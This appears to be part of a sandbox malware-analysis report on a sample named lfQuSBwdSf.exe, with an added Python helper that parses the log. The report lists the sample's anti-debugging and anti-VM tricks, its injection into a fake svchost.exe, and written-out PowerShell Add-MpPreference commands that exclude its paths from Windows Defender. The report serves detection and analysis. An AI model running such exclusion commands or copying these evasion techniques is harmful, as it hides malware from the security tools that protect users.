                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX [43 identical events]
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe; Process information set: NOOPENFILEERRORBOX [36 identical events]
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX [2 identical events]
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe; Process information set: NOOPENFILEERRORBOX [46 identical events]
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe; Process information set: NOOPENFILEERRORBOX [36 identical events]
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX [20 identical events]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX [28 identical events]

                      Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe; Section loaded: OutputDebugStringW count: 230
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe; Section loaded: OutputDebugStringW count: 115
Yara detected Beds Obfuscator
Source: Yara match; File source: 00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.517681508.0000000004965000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 23.2.svchost.exe.4a72390.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 23.2.svchost.exe.4ad53b0.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 23.2.svchost.exe.4ad53b0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.svchost.exe.49c8f18.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.svchost.exe.4965ef8.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.2.lfQuSBwdSf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.svchost.exe.4965ef8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 23.2.svchost.exe.4a72390.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.svchost.exe.49c8f18.2.raw.unpack, type: UNPACKEDPE
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe; File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 [3 identical events]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3193
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2412
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2279
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2611
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1755
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1706
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe TID: 3156; Thread sleep count: 100 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3032; Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3032; Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 492; Thread sleep count: 2279 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2576; Thread sleep count: 57 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5364; Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5364; Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2224; Thread sleep count: 2611 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 464; Thread sleep count: 1755 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6332; Thread sleep count: 50 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5684; Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5684; Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5572; Thread sleep count: 1706 > 30
Source: C:\Windows\System32\svchost.exe TID: 6288; Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe TID: 6532; Thread sleep count: 100 > 30
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe TID: 6912; Thread sleep count: 100 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5544; Thread sleep count: 63 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5080; Thread sleep count: 35 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6204; Thread sleep count: 39 > 30
Source: C:\Windows\System32\svchost.exe; File opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Last function: Thread delayed [2 identical events]
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 [3 identical events]
Source: svchost.exe, 00000004.00000002.253983082.0000015A16F40000.00000002.00000001.sdmp; Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: lfQuSBwdSf.exe, 00000000.00000002.339679694.000000000134F000.00000004.00000020.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
Source: svchost.exe, 00000004.00000002.253983082.0000015A16F40000.00000002.00000001.sdmp; Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000004.00000002.253983082.0000015A16F40000.00000002.00000001.sdmp; Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000004.00000002.253983082.0000015A16F40000.00000002.00000001.sdmp; Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe; Process information queried: ProcessInformation
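The behaviour lines on this page (the Process information set lines above, the evasion events in this section and the Thread information set: HideFromDebugger lines under Anti Debugging below) all share one layout: a Source column naming the acting process, optionally a TID, then the observed event. The Python below is an added triage helper written for this page; it is not part of the Joe Sandbox report or its tooling. It parses that layout (both the delimited form used here and the raw export in which the event text is fused directly onto the image path), collapses identical events into counts, and tallies per process the indicators that matter for an analyst: ThreadHideFromDebugger, sleep loops, OutputDebugStringW loops and probes for VM hardware names. The sample lines are constructed from values shown on this page. Assumptions are marked in the code: the sleep-loop threshold of 30 mirrors the report's own "> 30" comparison, the VM marker list is a heuristic, memory-dump sources are skipped, and NOOPENFILEERRORBOX alone is not treated as a finding because WerFault.exe and powershell.exe set it here as well.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in this report's layout: "Source: <process> [TID: n]; <event>".
# Paths and values are taken from the page; the set is kept small so it runs offline.
SAMPLE = r"""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe; Section loaded: OutputDebugStringW count: 230
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe; Section loaded: OutputDebugStringW count: 115
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe TID: 3156; Thread sleep count: 100 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 492; Thread sleep count: 2279 > 30
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe; File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe; Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe; Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe; Thread information set: HideFromDebugger
"""

LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.*?\.exe)"     # image path of the acting process
    r"(?:\s+TID:\s*(?P<tid>\d+))?"      # optional thread id
    r"\s*;?\s*(?P<event>\S.*?)\s*$"     # event text; raw exports fuse it onto the path
)
SLEEP_COUNT_RE = re.compile(r"Thread sleep count:\s*(\d+)\s*>\s*(\d+)")
ODS_RE = re.compile(r"OutputDebugStringW count:\s*(\d+)")
# Heuristic marker list (assumption): hypervisor vendor names that show up in device paths.
VM_MARKERS = ("vmware", "vbox", "virtualbox", "qemu", "hyper-v")


def parse(text):
    """Return (source, tid, event) triples for every process-sourced event line."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        # Memory-dump sources look like "svchost.exe, 00000004....sdmp"; they carry
        # strings, not process actions, so they are skipped here (assumption).
        if not m or m["event"].startswith(","):
            continue
        events.append((m["src"], m["tid"], m["event"]))
    return events


def collapse(events):
    """Count identical (source, event) pairs; order of first appearance is kept."""
    return Counter((src, ev) for src, _tid, ev in events)


def summarize(events):
    """Per-process tally of anti-analysis indicators."""
    by_proc = defaultdict(lambda: {"hide_from_debugger": 0, "sleep_loop_max": 0,
                                    "outputdebugstring_calls": 0, "vm_artifacts": [],
                                    "error_mode_set": 0})
    for src, _tid, ev in events:
        rec = by_proc[src]
        if ev.startswith("Thread information set: HideFromDebugger"):
            rec["hide_from_debugger"] += 1          # NtSetInformationThread(ThreadHideFromDebugger)
        elif ev.startswith("Process information set:"):
            rec["error_mode_set"] += 1              # SetErrorMode; benign on its own
        elif (m := SLEEP_COUNT_RE.search(ev)):
            rec["sleep_loop_max"] = max(rec["sleep_loop_max"], int(m.group(1)))
        elif (m := ODS_RE.search(ev)):
            rec["outputdebugstring_calls"] += int(m.group(1))
        elif ev.startswith("File opened / queried:") and any(k in ev.lower() for k in VM_MARKERS):
            rec["vm_artifacts"].append(ev.split(":", 1)[1].strip())
    return dict(by_proc)


def flag_anti_analysis(summary, sleep_threshold=30):
    """Map process -> reasons; the threshold mirrors the report's '> 30' check (assumption)."""
    flagged = {}
    for src, rec in summary.items():
        reasons = []
        if rec["hide_from_debugger"]:
            reasons.append(f"ThreadHideFromDebugger x{rec['hide_from_debugger']}")
        if rec["sleep_loop_max"] > sleep_threshold:
            reasons.append(f"sleep loop of {rec['sleep_loop_max']} iterations")
        if rec["outputdebugstring_calls"]:
            reasons.append(f"OutputDebugStringW loop x{rec['outputdebugstring_calls']}")
        if rec["vm_artifacts"]:
            reasons.append("VM artifact probed")
        if reasons:                                  # error_mode_set alone never flags
            flagged[src] = reasons
    return flagged


if __name__ == "__main__":
    ev = parse(SAMPLE)
    for (src, text), n in collapse(ev).items():
        print(f"{n:4d}x {src}  {text}")
    for src, reasons in flag_anti_analysis(summarize(ev)).items():
        print(src, "->", "; ".join(reasons))
```

Run as a script it prints the collapsed event list followed by one line per flagged process. Note that powershell.exe is flagged for its sleep loop just as the report flags it, which is why the per-process breakdown matters more than a single verdict: the dropped svchost.exe and the original sample are the processes that combine ThreadHideFromDebugger, the OutputDebugStringW loop and the VMware CD-ROM probe.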

                      Anti Debugging:

                      Hides threads from debuggersShow sources
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Process queried: DebugPort
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process queried: DebugPort
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process queried: DebugPort
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process queried: DebugPort
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Process token adjusted: Debug
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lfQuSBwdSf.exe' -Force
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lfQuSBwdSf.exe' -Force
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
Injects a PE file into a foreign processes
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Memory written: unknown base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lfQuSBwdSf.exe' -Force
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe	Process created: C:\Users\user\Desktop\lfQuSBwdSf.exe C:\Users\user\Desktop\lfQuSBwdSf.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: unknown unknown
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: unknown unknown
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: unknown unknown
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: unknown unknown
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: unknown unknown
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	Process created: unknown unknown
